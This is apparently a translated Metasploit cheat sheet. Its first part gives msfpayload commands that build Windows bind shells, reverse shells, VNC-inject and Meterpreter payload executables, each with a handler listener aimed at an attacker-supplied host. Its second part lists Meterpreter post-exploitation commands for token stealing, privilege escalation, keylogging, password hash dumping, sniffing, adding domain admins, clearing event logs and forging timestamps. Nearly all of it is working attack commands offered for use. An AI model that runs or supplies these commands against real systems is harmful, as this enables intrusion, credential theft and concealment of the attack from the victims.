MsfPayloads & Meterpreter commands
0x01 MsfPayloads
1. Listening shell bound to a port on the target
./msfpayload windows/shell_bind_tcp LPORT=4444 X > open_shell_on_port.exe
Connect directly to the port with nc.
2. Reverse shell
./msfpayload windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx X > reverse-shell.exe
Local listener:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx E
3. Bind-port shell over the VNC protocol
./msfpayload windows/vncinject/bind_tcp LPORT=4444 X > listen-vnc.exe
Local handler:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=4444 RHOST=xxx.xxx.xxx.xxx DisableCourtesyShell=TRUE E
4. Reverse VNC session shell
./msfpayload windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 X > /tmp/reverse-vnc.exe
Local listener:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 DisableCourtesyShell=TRUE E
5. Meterpreter bind-port shell
./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > meterpreter-bind.exe
Connect from the local side:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=xxx.xxx.xxx.xxx LPORT=4444 E
6. Meterpreter reverse shell
./msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 X > reverse-meterpreter.exe
Local listener:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 E
0x02 Meterpreter
help: show help
run script: run a script, e.g. get_local_subnets
sysinfo: show system information
ls: list the directory
use priv: load the privilege extension
ps: list processes
migrate PID: migrate into the given process
use incognito: load the incognito extension (used to impersonate tokens from another machine; I don't really understand this feature either?)
list_tokens -u: list available user tokens
list_tokens -g: list available group tokens
impersonate_token DOMAIN_NAME\\USERNAME: impersonate a domain user's token
steal_token PID: steal the token of the given process
drop_token: drop the impersonated token (reduce privileges)
getsystem: attempt to elevate privileges automatically using several techniques
shell: open an interactive shell
execute -f cmd.exe -i: start cmd.exe and interact with it
execute -f cmd.exe -i -t: run cmd.exe with the currently held tokens
rev2self: revert to the original user's privileges
reg command: operate on the registry (create, delete, query, set)
setdesktop number: select the current user desktop
screenshot: take a screenshot of the target
upload file: upload a file
download file: download a file
keyscan_start: start the keylogger
keyscan_dump: view the captured keystrokes
keyscan_stop: stop the keylogger
getprivs: attempt to obtain all available privileges
uictl enable keyboard/mouse: control the mouse/keyboard
background: put Meterpreter in the background
hashdump: dump password hashes
use sniffer: load the sniffer module
sniffer_interfaces: list all interfaces available for sniffing
sniffer_dump interfaceID pcapname: dump the capture from the given interface to a pcap file
sniffer_start: start sniffing
sniffer_start interfaceID packet-buffer: set the buffer size and sniff on the given interface
sniffer_stats interfaceID: get statistics for the interface
sniffer_stop interfaceID: stop sniffing
add_user: add a user
add_group_user "Domain Admins": add a user to the Domain Admins group
clearev: clear the event logs
timestomp: change file attributes (timestamps)
reboot: reboot